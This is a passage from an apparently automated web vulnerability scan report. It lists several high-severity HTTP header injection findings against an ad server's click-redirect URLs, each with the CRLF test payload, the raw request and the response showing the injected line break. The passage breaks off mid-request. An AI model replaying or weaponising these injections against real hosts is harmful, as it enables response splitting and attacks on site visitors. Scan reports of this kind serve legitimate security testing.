GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/5b6fb%0d%0a147c7cf0d7/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aXnh31OZb36HOXs3RM1FYJ3w0PdSEAkTMacnIOIZcNPbSw3YyVx5YBZdZcZdCRO5QaBLQxK6AFKfg24u17JPIv9VFnRZbZa7GZaDg07As8qSwZdd8cf4GGcywn5jujUYsXc7kMeF7COM8ZdWA0JbDUZbQefiprsqv56mZcy3spk5JMr72yeGVlee7jvywxbPWuTwZdO7ZdmlxZanGkJGZdQXScL4CCoGZdY1IX6cX0lHeojYjEcbTqMMLf4yJ405ISh32Zd2jklZaOBD4rWKmH6h2OXMyZaYVkn1lqk5dl9CjRKeJmZbu6rf1cuRRBwU3n9Lq4ZbqImjhHvsTx7ctCqNeKIgPUloWpHnZaM0mSU6CMPfd1s6DZbvNDHDgL9ivyUDDE2ZaKFsC0c2txH8sM5ODhIZb18wSGLifxYQtnKYttZaSOZdqQXo5SxnSFw8cZcmvC8A59WCF5LG3nnJD8mZcgrFO24uAXcGEF4jnuVZcYQEtmcjiSQuDZb5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:49 GMT;
Content-Type: text/html
Location: http:/5b6fb
147c7cf0d7
/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.27. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 8b8e4%0d%0ae7010146c86 was submitted in REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/8b8e4%0d%0ae7010146c86 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:26:03 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/8b8e4
e7010146c86

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.28. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 97bca%0d%0a2b7989845c9 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=97bca%0d%0a2b7989845c9&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnh31y4ZaZaeh2urRZbsIX35SyymuEXfWkqnnYrbUKZaVUpte4duxZdYUD3ZdPHJrtklbdjYjYB1Y1FZcRMMulntIUKiyGO3tCyiHUKhY4oD6BGA4P9nrZaBUlIUjRGPZakZaCGf9Crrq917x5vOyqYmDhZaR1fqJk24DKcXi0FMOUJkqHZc55JwgUBNlqGtASpwjbuH1ZbxsnGxhSSIZdXF2kvDGgbmhOUSYKuOJh7y92HInxKf37v4LlMMLO1gqiSOjejY5Rgp6994IMNeFwNBZchMlpf3A8jYV9IHZduZcYisTmCPkOvyU1OlZbTpAd7d5dVJRZaMQhjnFrZcv7gHZcS7UPqCgOn14MSvPPwn7j0VXxgNFDEUgHaZdYUFUcSUwwZdqo84fWtbiTfZbSBfDFZcZbenGXnjvQv9dcvrRn2ulP60QH2uQlG3nOIkY9NZbiE3HbxFLI6Zdf9S6ZbhBnvyWjfgL0GUC9lwwZa3J2WuC3yskrWEp; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:38 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=97bca
2b7989845c9
&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.29. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload 2b31b%0d%0ade2b2ba9b51 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=2b31b%0d%0ade2b2ba9b51&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:16 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=2b31b
de2b2ba9b51
&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.30. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcn request parameter is copied into the Location response header. The payload 4af06%0d%0a498f542876a was submitted in the dcn parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=4af06%0d%0a498f542876a HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:44 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=4af06
498f542876a

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.31. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload 6aeb8%0d%0adcca9fab7ae was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=6aeb8%0d%0adcca9fab7ae&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:10 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=6aeb8
dcca9fab7ae
&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.32. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d9f87%0d%0aa0e3ab0b09a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r?d9f87%0d%0aa0e3ab0b09a=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:23 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?d9f87
a0e3ab0b09a
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.33. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [vehicle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload 3441b%0d%0a47ca73b60ee was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=3441b%0d%0a47ca73b60ee&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:54 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=3441b
47ca73b60ee
&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.34. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload 655ab%0d%0a1d53ab93dd7 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=655ab%0d%0a1d53ab93dd7 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
